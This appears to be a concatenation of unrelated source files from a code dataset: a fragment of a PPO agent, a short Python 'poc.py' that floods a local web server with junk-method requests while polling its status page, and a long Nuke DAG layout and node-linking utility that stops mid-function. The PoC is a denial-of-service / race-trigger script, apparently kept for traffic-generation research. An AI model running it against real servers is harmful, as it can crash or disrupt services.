self.actions_ind [diff] = False
# 这里希望return action probs
action_prob = self.ppo.get_action(obs)
action = np.argmax(action_prob[self.actions_ind])
return action
def update(self, databatch):
self.ppo.update(databatch) | 2.4375 | 2 |
trafficgen/benignGenerator/DataGen/wordpressautonew/poc.py | cyberdeception/deepdig | 5 | 12766438 | #! /usr/bin/env python
import httplib
import sys
import threading
import subprocess
import random
def send_request(method, url):
try:
c = httplib.HTTPConnection('127.0.0.1', 80)
c.request(method,url);
if "foo" in url:
print c.getresponse().read()
c.close()
except Exception, e:
print e
pass
def mod_status_thread():
while True:
send_request("GET", "/")
def requests():
evil = ''.join('A' for i in range(random.randint(0, 1024)))
while True:
send_request(evil, evil)
threading.Thread(target=mod_status_thread).start()
threading.Thread(target=requests).start()
| 2.8125 | 3 |
tools/python/nuketools/dag.py | cheekynie/nuke-config | 0 | 12766439 | <filename>tools/python/nuketools/dag.py<gh_stars>0
import nuke
import nukescripts
import operator, math, os
import string
import random
# Utilities for enhancing efficiency when interacting with Nuke's Directed Acyclic Graph
# Register keyboard shortcuts and menu entries
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Right', 'dag.move(4, 0)', 'alt+meta+Right')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Left', 'dag.move(-4, 0)', 'alt+meta+Left')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Up', 'dag.move(0, -4)', 'alt+meta+Up')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Down', 'dag.move(0, 4)', 'alt+meta+Down')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Right Big', 'dag.move(1, 0)', 'alt+meta+shift+Right')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Left Big', 'dag.move(-1, 0)', 'alt+meta+shift+Left')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Up Big', 'dag.move(0, -1)', 'alt+meta+shift+Up')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Down Big', 'dag.move(0, 1)', 'alt+meta+shift+Down')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Up Vertical', 'dag.scale(1, 2)', 'meta+shift++', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Down Vertical', 'dag.scale(1, 0.5)', 'meta+shift+_', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Up Horizontal', 'dag.scale(0, 2)', 'meta+=', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Down Horizontal', 'dag.scale(0, 0.5)', 'meta+-', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Horizontal from Right', 'dag.scale(0, -1, pivot="min")', 'meta+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Horizontal from Left', 'dag.scale(0, -1, pivot="max")', 'meta+shift+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Vertical from Top', 'dag.scale(1, -1, pivot="max")', 'ctrl+meta+alt+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Vertical from Bottom', 'dag.scale(1, -1, pivot="min")', 'ctrl+alt+meta+shift+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Left', 'dag.align("left")', 'ctrl+shift+left', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Right', 'dag.align("right")', 'ctrl+shift+right', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Up', 'dag.align("up")', 'ctrl+shift+up', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Down', 'dag.align("down")', 'ctrl+shift+down', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Snap to Grid', 'dag.snap_to_grid()', 'alt+s', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Connect Selected to Closest', 'dag.connect_to_closest()', 'meta+shift+y', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Connect Closest to Selected', 'dag.connect_to_closest(direction=1)', 'alt+meta+shift+y', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Paste To Selected', 'dag.paste_to_selected()', 'alt+v', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Read from Write', 'dag.read_from_write()', 'alt+r', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar Class', 'nuke.selectSimilar(nuke.MATCH_CLASS)', 'alt+meta+shift+s', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar Color', 'nuke.selectSimilar(nuke.MATCH_COLOR)', 'alt+meta+shift+c', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar Y Position', 'dag.select_similar_position(axis=1)', 'alt+meta+shift+v', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar X Position', 'dag.select_similar_position(axis=0)', 'ctrl+alt+meta+shift+v', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Upstream', 'dag.select_upstream(nuke.selectedNodes())', 'alt+meta+shift+u', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Invert Selection', 'nuke.invertSelection()', 'alt+meta+shift+i', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Connected Nodes', 'dag.select_connected(nuke.selectedNodes())', 'alt+meta+shift+o', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Downstream', 'dag.select_downstream(nuke.selectedNodes())', 'alt+meta+shift+p', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Unused Nodes', 'dag.select_unused(nuke.selectedNodes())', 'ctrl+alt+meta+shift+u', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Properties Panel Open', 'dag.open_panels()', 'a', shortcutContext=1)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Properties Panel Close', 'dag.close_panels()', 'alt+a', shortcutContext=1)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Sort By File Knob', 'dag.auto_place()', 'l', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/Declone', 'dag.declone_nodes(nuke.selectedNodes())', 'alt+shift+k', shortcutContext=2)
nuke.menu('Nuke').addCommand('File/Export Selected with Root Settings', 'dag.export_selected_nodes()', 'ctrl+shift+e', index=7)
nuke.menu('Nuke').addCommand('File/Import Script', 'nukescripts.import_script()', 'ctrl+shift+i', index=8)
nuke.menu('Nuke').addCommand('Edit/Node/Swap A - B', 'dag.swap_node()', 'shift+x')
nuke.menu('Viewer').addCommand("Swap View", "dag.swap_view()", "shift+q")
nuke.menu('Nodes').addCommand( 'Transform/Transform', 'dag.create_transform()', 't')
nuke.menu('Nodes').addCommand('Other/Create Dots', 'dag.create_dots()', 'alt+d', shortcutContext=2)
nuke.menu('Nodes').addCommand('Other/Create Side Dots', 'dag.create_dots(side=True)', 'alt+shift+d', shortcutContext=2)
# DAG Position Commands
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 1', 'nukescripts.bookmarks.quickRestore(1)', 'ctrl+1', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 2', 'nukescripts.bookmarks.quickRestore(2)', 'ctrl+2', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 3', 'nukescripts.bookmarks.quickRestore(3)', 'ctrl+3', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 4', 'nukescripts.bookmarks.quickRestore(4)', 'ctrl+4', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 5', 'nukescripts.bookmarks.quickRestore(5)', 'ctrl+5', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 6', 'nukescripts.bookmarks.quickRestore(6)', 'ctrl+6', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 1', 'nukescripts.bookmarks.quickSave(1)', 'ctrl+shift+1', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 2', 'nukescripts.bookmarks.quickSave(2)', 'ctrl+shift+2', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 3', 'nukescripts.bookmarks.quickSave(3)', 'ctrl+shift+3', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 4', 'nukescripts.bookmarks.quickSave(4)', 'ctrl+shift+4', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 5', 'nukescripts.bookmarks.quickSave(5)', 'ctrl+shift+5', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 6', 'nukescripts.bookmarks.quickSave(6)', 'ctrl+shift+6', shortcutContext=2)
# # Hlink Nodes
# nuke.menu('Nuke').addCommand('Edit/HLink Cut', 'dag.hlink_cut()', 'ctrl+x')
# nuke.menu('Nuke').addCommand('Edit/HLink Copy', 'dag.hlink_copy()', 'ctrl+c')
# nuke.menu('Nuke').addCommand('Edit/HLink Paste', 'dag.hlink_paste()', 'ctrl+v')
# nuke.menu('Nuke').addCommand('Edit/HLink Create', 'dag.hlink_create()', 'alt+shift+p')
# nuke.menu('Nuke').addCommand('Edit/Paste', 'nuke.nodePaste("%clipboard%")', 'ctrl+shift+v', index=6)
nuke.menu('Nodes').addCommand('Other/Create Pointer', 'dag.create_pointer()', 'alt+t')
# Get the grid size from the preferences. Used as the default unit of movement.
grid = (int(nuke.toNode('preferences').knob('GridWidth').value()), int(nuke.toNode('preferences').knob('GridHeight').value()))
def unselect(nodes=None):
# Unselect nodes
if not nodes:
nodes = nuke.allNodes(recurseGroups=True)
if not isinstance(nodes, list):
return
_ = [n.setSelected(False) for n in nodes]
def select(nodes):
# Select specified nodes
if not isinstance(nodes, list):
return
_ = [n.setSelected(True) for n in nodes]
def get_parent(node):
# return node's parent node, return nuke.root() if on the top level
return nuke.toNode('.'.join(node.fullName().split('.')[:-1])) or nuke.root()
def get_topnode(node):
# return the topnode of node
return nuke.toNode(nuke.tcl('return [value [topnode {0}].name]'.format(node.fullName())))
def get_pos(node):
# return 2d list of centered node positions
if node.Class() == 'BackdropNode':
return [node.xpos(), node.ypos()]
else:
return [node.xpos() + node.screenWidth()/2, node.ypos() + node.screenHeight()/2]
def set_pos(node, posx, posy):
# Set node's position given a centered position based on screen width
# param: pos - 2dim list of int node positions
if node.Class() == 'BackdropNode':
return node.setXYpos(int(posx), int(posy))
else:
return node.setXYpos(int(posx - node.screenWidth()/2), int(posy - node.screenHeight()/2))
def hide_panel():
# Always hide control panels on node creation if node not in exceptions
node = nuke.thisNode()
exceptions = ['Roto', 'RotoPaint']
if node.Class() not in exceptions:
nuke.thisNode().showControlPanel()
nuke.thisNode().hideControlPanel()
nuke.addOnUserCreate(hide_panel)
def open_panels(nodes=None):
# Open properties panels
if not nodes:
nodes = nuke.selectedNodes()
ignored = ['Viewer']
if len(nodes) > 10:
if not nuke.ask('Continuing will open {0} properties panels. \nAre you sure you want to continue?'.format(len(nodes))):
return
for node in nodes:
if node.Class() not in ignored:
# if node.shown():
# if nclass in buggy:
# # There is a bug with node.shown() for some node classes, where .shown()
# # incorrectly returns true if it is hidden. Workaround by cutting node and undoing
# nuke.Undo().begin()
# nuke.delete(node)
# nuke.Undo().end()
# nuke.undo()
# node.setSelected(True)
# node.hideControlPanel()
# else:
node.showControlPanel()
def close_panels(nodes=None):
# Close all properties panels
if not nodes:
nodes = nuke.allNodes(recurseGroups=True)
for node in nodes:
node.hideControlPanel()
def select_similar_position(axis=1):
nodes = nuke.selectedNodes()
if not nodes:
return
node = nodes[0]
prev_selected = nodes[1:]
threshold = 1
unselect()
select(prev_selected)
if axis:
same_pos_nodes = {n:n.xpos() for n in nuke.allNodes() if abs(n.ypos()- node.ypos()) < threshold}
else:
same_pos_nodes = {n:n.ypos() for n in nuke.allNodes() if abs(n.xpos()- node.xpos()) < threshold}
sorted_nodes = sorted(same_pos_nodes.items(), key=operator.itemgetter(1))
for n, pos in sorted_nodes:
n.setSelected(True)
def snap_to_grid():
# Snap selected nodes to grid
nodes = nuke.selectedNodes()
for node in nodes:
nuke.autoplaceSnap(node)
def auto_place():
# autoplace all selected
nodes = nuke.selectedNodes()
# Sort by file knob value if the nodes have one
filenodes = {n: n['file'].getValue() for n in nodes if 'file' in n.knobs()}
if filenodes:
sorted_filenodes = sorted(filenodes.items(), key=operator.itemgetter(1))
filenodes_pos = {n: [n.xpos(), n.ypos()] for n in nodes if 'file' in n.knobs()}
ypos_sort = sorted(filenodes_pos.items(), key=lambda (k, v): v[1])
xpos_sort = sorted(filenodes_pos.items(), key=lambda (k, v): v[0])
start_pos = [xpos_sort[0][1][0], ypos_sort[0][1][1]]
for node, filepath in sorted_filenodes:
node.setXYpos(start_pos[0], start_pos[1])
start_pos = (start_pos[0] + grid[0]*2, start_pos[1])
# Normal autoplace for nodes without file knob
normal_nodes = [n for n in nodes if 'file' not in n.knobs()]
unselect()
_ = [n.setSelected(True) for n in normal_nodes]
nuke.autoplace_all()
_ = [n.setSelected(True) for n in nodes]
def move(xvel, yvel):
# Move selected nodes by specified number of grid lengths in x and y
yvel *= 3
nodes = nuke.selectedNodes()
for node in nodes:
node.setXYpos(int(node.xpos() + grid[0] * xvel), int(node.ypos() + grid[1] * yvel))
def get_closest_node(node):
# Return the closest node to node
distances = {}
for n in nuke.allNodes():
if n.name() == node.name():
continue
distance = math.sqrt(
math.pow( (node.xpos() - n.xpos()), 2 ) + math.pow( (node.ypos() - n.ypos()), 2 )
)
distances[n.name()] = distance
return nuke.toNode(min(distances, key=distances.get))
def connect_to_closest(direction=0):
# Connect next available input of all selected nodes to the closest node
for node in nuke.selectedNodes():
closest = get_closest_node(node)
if direction:
closest.setInput(0, node)
else:
node.connectInput(0, closest)
def paste_to_selected():
nodes = nuke.selectedNodes()
all_nodes = nuke.allNodes()
unselect()
for node in nodes:
node.setSelected(True)
nuke.nodePaste('%clipboard')
unselect()
if not nodes:
nuke.nodePaste('%clipboard')
# Select pasted nodes
select(all_nodes)
nuke.invertSelection()
def align(direction):
# Align nodes to the farthest outlier in the specified direction.
# param: direction - one of: left | right | up | down
nodes = nuke.selectedNodes()
if len(nodes) < 2:
return
horizontally = ['left', 'right']
vertically = ['up', 'down']
if direction in horizontally:
align = 0
elif direction in vertically:
align = 1
else:
print 'Error: invalid direction specified: {0}'.format(direction)
return
positions = {n: get_pos(n) for n in nodes}
sorted_positions = sorted(positions.items(), key=lambda (k, v): v[align])
if direction in ['down', 'right']:
sorted_positions.reverse()
target = sorted_positions[0]
target_pos = target[1]
offset = 0
other_axis = abs(1 - align)
sorted_other_axis = sorted(positions.items(), key=lambda (k, v): v[other_axis])
nuke.Undo().begin()
for i in range(len(sorted_other_axis)):
node = sorted_other_axis[i][0]
pos = sorted_other_axis[i][1]
if i == 0:
distance = 0
overlapping = False
prev_pos = pos
else:
prev_pos = sorted_other_axis[i-1][1]
# Compare current node position to previous node position.
# If difference is < overlap threshold, nodes are overlapping.
distance = abs(pos[other_axis] + grid[other_axis] * offset - prev_pos[other_axis])
overlap_threshold = [int(node.screenWidth() * 1.1), int(node.screenHeight() * 1.1)]
overlapping = distance < overlap_threshold[other_axis]
if overlapping:
offset += 1
new_pos = pos
new_pos[other_axis] = int(pos[other_axis] + grid[other_axis] * offset)
# Set value into sorted_other_axis also so we access the right value on the next loop
sorted_other_axis[i][1][other_axis] = new_pos[other_axis]
if align:
set_pos(node, new_pos[other_axis], target_pos[align])
else:
set_pos(node, target_pos[align], new_pos[other_axis])
i += 1
nuke.Undo().end()
def scale(axis, scale, pivot='max'):
# Scale selected nodes by factor of xscale, yscale
# param: axis - one of 0 or 1 - x or y scale
# param: float scale - factor to scale. 1 will do nothing. 2 will scale up 1 grid unit.
# param: str pivot - where to scale from. One of min | max | center
pivots = ['min', 'max', 'center']
if pivot not in pivots:
return
nodes = nuke.selectedNodes()
if len(nodes) < 2:
return
positions = {n: get_pos(n) for n in nodes}
sort = sorted(positions.items(), key=lambda (k, v): v[axis])
minpos = sort[0][1][axis]
maxpos = sort[-1][1][axis]
if pivot == 'max':
pivot_pos = maxpos
elif pivot == 'min':
pivot_pos = minpos
elif pivot == 'center':
pivot_pos = (minpos - maxpos)/2 + minpos
nuke.Undo().begin()
for node, pos in positions.iteritems():
if axis:
new_pos = (pos[1] - pivot_pos) * scale + pivot_pos
set_pos(node, pos[0], new_pos)
if node.Class() == 'BackdropNode':
bdpos = ((pos[1] + node['bdheight'].getValue()) - pivot_pos) * scale + pivot_pos - node.ypos()
print pos[1]
print new_pos
print bdpos
if scale > 0:
node['bdheight'].setValue(bdpos)
else:
node.setXYpos(pos[0], int(new_pos-abs(bdpos)))
else:
new_pos = (pos[0] - pivot_pos) * scale + pivot_pos
set_pos(node, new_pos, pos[1])
if node.Class() == 'BackdropNode':
bdpos = ((pos[0] + node['bdwidth'].getValue()) - pivot_pos) * scale + pivot_pos - node.xpos()
if scale > 0:
node['bdwidth'].setValue(bdpos)
else:
node.setXYpos(int(new_pos-abs(bdpos)), int(node.ypos()))
nuke.Undo().end()
def copy_inputs(src, dst):
# copy input connections from src node to dst node
# number of inputs must be the same between nodes
for j in range(dst.inputs()):
dst.setInput(j, None)
for i in range(src.inputs()):
dst.setInput(i, src.input(i))
def declone(node):
# Declone a single node
if not node.clones():
return
parent = get_parent(node)
parent.begin()
node.setSelected(True)
args = node.writeKnobs( nuke.WRITE_ALL | nuke.WRITE_USER_KNOB_DEFS |
nuke.WRITE_NON_DEFAULT_ONLY | nuke.TO_SCRIPT)
decloned_node = nuke.createNode(node.Class(), knobs=args, inpanel=False)
copy_inputs(node, decloned_node)
nuke.delete(node)
parent.end()
return decloned_node
def declone_nodes(nodes):
# A better declone than the buggy default nukescripts.misc.declone()
unselect()
decloned_nodes = list()
for node in nodes:
decloned_nodes.append(declone(node))
if decloned_nodes:
# Restore selection
_ = [n.setSelected(True) for n in decloned_nodes]
def export_selected_nodes():
path = nuke.getFilename("Export Selected To:")
if not path:
return
nuke.nodeCopy(path)
root = nuke.root()
rootstring = root.writeKnobs(nuke.TO_SCRIPT | nuke.WRITE_USER_KNOB_DEFS)
rootstring = "%s\nfirst_frame %d\nlast_frame %d" % (rootstring, root['first_frame'].value(), root['last_frame'].value())
rootstring = "%s\nproxy_format \"%s\"" % (rootstring, root['proxy_format'].toScript())
rootstring = "Root {\n%s\n}" % rootstring
noroot = open(path).read()
with open(path, "w+") as f:
f.write((rootstring + "\n" + noroot))
#--------------------------------------------------------------
# Nuke Node Dependency Utilities
if nuke.NUKE_VERSION_MAJOR > 11:
connection_filter = nuke.INPUTS | nuke.HIDDEN_INPUTS | nuke.EXPRESSIONS | nuke.LINKINPUTS
else:
connection_filter = nuke.INPUTS | nuke.HIDDEN_INPUTS | nuke.EXPRESSIONS
def find_root_nodes(node, results=[], remove_roots_with_inputs=True):
# Find all root nodes of node.
# If remove_roots_with_inputs: remove root nodes with an input (like Roto etc)
for dependency in node.dependencies():
if not dependency.dependencies():
results.append(dependency)
else:
find_root_nodes(dependency, results)
if remove_roots_with_inputs:
results = [res for res in results if res.maxInputs() == 0]
return results
def upstream(node, max_depth=-1, deps=set([])):
if max_depth != 0:
new_deps = set([n for n in nuke.dependencies(node, what=connection_filter) if n not in deps])
deps |= new_deps
for dep in new_deps:
upstream(dep, max_depth-1, deps)
return deps
def connected(nodes, upstream=True, downstream=True):
# return all upstream and/or downstream nodes of node
# based on nuke.overrides.selectConnectedNodes()
all_deps = set()
deps_list = nodes
evaluate_all = True
while deps_list:
deps = []
if upstream:
deps += nuke.dependencies(deps_list, connection_filter)
if downstream:
deps += nuke.dependentNodes(connection_filter, deps_list, evaluate_all)
evaluate_all = False
deps_list = [d for d in deps if d not in all_deps and not all_deps.add(d)]
return all_deps
def select_upstream(nodes):
# Select all upstream dependencies of node
deps = [n for n in connected(nodes, upstream=True, downstream=False)]
select(deps)
return deps
def select_downstream(nodes):
# Select all downstream dependencies of node
deps = [n for n in connected(nodes, upstream=False, downstream=True)]
select(deps)
return deps
def select_connected(nodes):
# Select all nodes connected to node
deps = [n for n in connected(nodes, upstream=True, downstream=True)]
select(deps)
return deps
def select_unused(nodes):
# select all nodes that are not upstream or downstream of :param: nodes
# Backdrops and dot nodes with a label are omitted.
connected_nodes = [n for n in connected(nodes, upstream=True, downstream=True)]
unused_nodes = [n for n in nuke.allNodes() if n not in connected_nodes and n.Class() != 'BackdropNode' and not (n.Class() == 'Dot' and n['label'].getValue())]
unselect()
select(unused_nodes)
return unused_nodes
# DAG Positions
# Inspired by <NAME>'s sb_dagPosition.py https://www.bjorkvisuals.com/tools/the-foundrys-nuke/python
# Using built-in nukescripts.bookmarks module now instead.
def save_dag_pos(preset):
# Save current dag zoom and position as a preset on the active viewer
zoom = nuke.zoom()
pos = nuke.center()
viewer = nuke.activeViewer()
if not viewer:
nuke.message('Error: please create a viewer to store the dag positions on...')
return
else:
viewer = viewer.node()
if 'dagpos' not in viewer.knobs():
viewer.addKnob(nuke.String_Knob('dagpos', 'dagpos', '0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0'))
dagpos_knob = viewer['dagpos']
dagpos_knob.setFlag(nuke.STARTLINE)
dagpos_knob.setEnabled(False)
else:
dagpos_knob = viewer['dagpos']
dagpos_vals = dagpos_knob.getValue().split(':')
dagpos_vals.pop(preset-1)
new_dagpos = ','.join([str(zoom), str(pos[0]), str(pos[1])])
dagpos_vals.insert(preset-1, new_dagpos)
dagpos_knob.setValue(':'.join(dagpos_vals))
def load_dag_pos(preset):
# Load dag zoom and position from specified preset number
viewer = nuke.activeViewer()
if not viewer:
nuke.message('Error: please create a viewer to store the dag positions on...')
return
viewer = viewer.node()
if 'dagpos' not in viewer.knobs():
nuke.message('No preset positions created yet...')
return
dagpos_knob = viewer['dagpos']
dagpos_vals = dagpos_knob.getValue().split(':')[preset-1]
zoom, xpos, ypos = dagpos_vals.split(',')
nuke.zoom(float(zoom), [float(xpos), float(ypos)])
#----------------------------------------------------------------------------------
# Hidden Input Link Nodes
# This is no longer used in favor of the anchor / pointer workflow
def hidden_inputs_in_selection(nodes):
return [n for n in nodes if 'hide_input' in n.knobs() and n['hide_input'].getValue()]
def set_hlink_knobs(nodes):
# Add knob to track what node this node is connected to
for node in hidden_inputs_in_selection(nodes):
if not 'hlink_node' in node.knobs():
node.addKnob(nuke.String_Knob('hlink_node', 'hlink_node'))
input_node = node.input(0)
if input_node:
node['hlink_node'].setValue(input_node.fullName())
else:
node['hlink_node'].setValue('')
def hlink_copy():
nodes = nuke.selectedNodes()
if nodes:
set_hlink_knobs(nodes)
nuke.nodeCopy('%clipboard%')
def hlink_cut():
hlink_copy()
nukescripts.node_delete(popupOnError=True)
def hlink_paste():
nuke.nodePaste('%clipboard%')
for node in hidden_inputs_in_selection(nuke.selectedNodes()):
if 'hlink_node' in node.knobs():
target = nuke.toNode(node['hlink_node'].getValue())
if target:
node.setInput(0, target)
def hlink_create():
# Creates an hlink node for each selected node
nodes = nuke.selectedNodes()
unselect()
hlinks = []
for node in nodes:
hlink = nuke.createNode('Dot', 'hide_input 1 note_font_size 18', inpanel=False)
hlinks.append(hlink)
hlink.setInput(0, node)
target_name = node.fullName()
set_hlink_knobs([hlink])
hlink['hlink_node'].setValue(target_name)
label = hlink['label']
target_label = node['label'].getValue()
if node.Class() == 'Read':
label.setValue(' | ' + node['label'].getValue() + '\n' + os.path.basename(node['file'].getValue()))
elif target_label:
label.setValue(' | ' + target_label)
else:
label.setValue(' | ' + target_name)
hlink.setXYpos(node.xpos() - grid[0]*2, node.ypos()-grid[1]*0)
nuke.autoplaceSnap(hlink)
_ = [n.setSelected(True) for n in hlinks]
def dec2hex(dec):
hexcol = '%08x' % dec
return '0x%02x%02x%02x' % (int(hexcol[0:2], 16), int(hexcol[2:4], 16), int(hexcol[4:6], 16))
def create_pointer():
# Create an anchor / pointer set
# Customization Options
# Node class to use for anchor / pointer nodes. Defaults to NoOp but could be a Dot node if you prefer
AP_CLASS = 'NoOp'
# Displays an input / output icon on the node to visually differentiate it from the standard node class
AP_ICON = True
nodes = nuke.selectedNodes()
if not nodes:
return
for target in nodes:
upstream = [n for n in connected(nodes, upstream=True, downstream=False)]
if len(upstream) > 5:
if not nuke.ask('More than 5 upstream nodes. Are you sure you want to continue?'):
return
randstr = ''.join(random.choice(string.ascii_lowercase) for i in range(4))
topnode = get_topnode(target)
target_label = target['label'].getValue()
# If topnode has a file knob, use that to set title
# If it's a roto node, use the roto label
if 'file' in topnode.knobs():
pointer_title = os.path.basename(topnode['file'].getValue())
if '.' in pointer_title:
pointer_title = pointer_title.split('.')[0]
elif topnode.Class() in ['Roto', 'RotoPaint'] and topnode['label'].getValue():
pointer_title = topnode['label'].getValue()
elif target_label:
pointer_title = target_label
else:
pointer_title = ''
topnode_color = topnode['tile_color'].value()
if topnode_color == 0:
# Get default color from prefs if node is not colored https://community.foundry.com/discuss/topic/103301/get-the-default-tile-color-from-preferences
prefs = nuke.toNode('preferences')
default_colors = {prefs['NodeColour{0:02d}Color'.format(i)].value(): prefs['NodeColourClass{0:02d}'.format(i)].value() for i in range(1, 14)}
node_class = topnode.Class().lower()
node_class = ''.join([i for i in node_class if not i.isdigit()])
for color, classes in default_colors.items():
if node_class in classes:
topnode_color = color
break
if 'deep' in node_class:
topnode_color = prefs['NodeColourDeepColor'].value()
if len(nodes) == 1:
# Only prompt the user for info if there is one selected node
panel = nuke.Panel('Create Pointer')
panel.addSingleLineInput('title', pointer_title)
if panel.show():
pointer_title = panel.value('title')
else:
return
has_downstream = len(select_downstream(target)) > 0
unselect()
if not has_downstream:
target.setSelected(True)
# create anchor node
anchor = nuke.createNode(AP_CLASS, 'name ___anchor_{0}{1}label "<font size=7>\[value title]"'.format(randstr, ' icon Output.png ' if AP_ICON else ' '))
anchor.addKnob(nuke.Tab_Knob('anchor_tab', 'anchor'))
anchor.addKnob(nuke.String_Knob('title', 'title'))
anchor['title'].setValue(pointer_title)
anchor['tile_color'].setValue(topnode_color)
anchor.setInput(0, target)
anchor.setSelected(True)
# create pointer node
pointer = nuke.createNode(AP_CLASS, 'name ___pointer_{0} hide_input true{1}'.format(randstr, ' icon Input.png ' if AP_ICON else ''))
pointer.addKnob(nuke.Tab_Knob('pointer_tab', 'pointer'))
pointer.addKnob(nuke.String_Knob('target', 'target'))
pointer['target'].setValue(anchor.fullName())
pointer['label'].setValue('<font size=7> [if {[exists input.title]} {return [value input.title]}]')
pointer.addKnob(nuke.PyScript_Knob('connect_to_target', 'connect'))
pointer['connect_to_target'].setFlag(nuke.STARTLINE)
pointer.addKnob(nuke.PyScript_Knob('zoom_to_target', 'zoom'))
pointer.addKnob(nuke.PyScript_Knob('set_target', 'set target'))
pointer['connect_to_target'].setValue('''n = nuke.thisNode()
t = n['target'].getValue()
if nuke.exists(t):
tn = nuke.toNode(t)
n.setInput(0, tn)''')
pointer['zoom_to_target'].setValue('''t = nuke.thisNode()['target'].getValue()
if nuke.exists(t):
tn = nuke.toNode(t)
nuke.zoom(2.0, [tn.xpos(), tn.ypos()])''')
pointer['set_target'].setValue('''n = nuke.thisNode()
sn = nuke.selectedNodes()
if sn:
t = sn[-1]
n['target'].setValue(t.fullName())''')
# set autolabel knob to execute python script to reconnect node to target.
# it's a hack but it works to automatically reconnect the input without using knobChanged callbacks!
# FYI, onCreate callback can not connect input 0 due to a nuke bug
pointer['autolabel'].setValue('"{0}\\n{1}".format(nuke.thisNode().name(), nuke.thisNode()["label"].evaluate()) if nuke.thisNode().setInput(0, nuke.toNode(nuke.thisNode()["target"].getValue())) else ""')
pointer.setXYpos(anchor.xpos(), anchor.ypos()+120)
pointer['tile_color'].setValue(topnode_color)
def create_dots(side=False):
# Create dot nodes
nodes = nuke.selectedNodes()
dots = list()
for node in nodes:
unselect()
pos = get_pos(node)
if not side:
select([node])
dot = nuke.createNode('Dot', inpanel=False)
if side:
set_pos(dot, pos[0] - grid[0], pos[1])
dot.setInput(0, node)
else:
set_pos(dot, pos[0], pos[1] + grid[1]*2)
dots.append(dot)
unselect(dot)
select(dots)
if not nodes:
dot = nuke.createNode('Dot', inpanel=False)
def create_transform():
# Create a Transform or TransformGeo node depending on node type
nodes = nuke.selectedNodes()
if not nodes:
nuke.createNode('Transform')
return
unselect()
transform_nodes = list()
for node in nodes:
node.setSelected(True)
if 'render_mode' in node.knobs():
new_node = nuke.createNode('TransformGeo')
if new_node:
transform_nodes.append(new_node)
else:
new_node = nuke.createNode('Transform')
if new_node:
transform_nodes.append(new_node)
unselect()
select(transform_nodes)
def read_from_write():
# Create read nodes from selected write nodes
nodes = [n for n in nuke.selectedNodes() if 'file' in n.knobs()]
excluded = ['Read', ]
for node in nodes:
if node.Class() in excluded:
continue
pos = get_pos(node)
filepath = node['file'].getValue()
if '[' in filepath:
# contains tcl expression. use evaluate instead.
filepath_eval = node['file'].evaluate()
dirname = os.path.dirname(filepath)
filename = os.path.basename(filepath)
if '#' in filename:
is_sequence = True
filename_base = filename.split('#')[0]
elif r'%' in filename:
is_sequence = True
filename_base = filename.split(r'%')[0]
else:
is_sequence = False
if is_sequence:
sequences = nuke.getFileNameList(dirname)
for seq in sequences:
if seq.startswith(filename_base):
filepath = os.path.join(dirname, seq)
break
read = nuke.createNode('Read', 'file {{{0}}}'.format(filepath), inpanel=False)
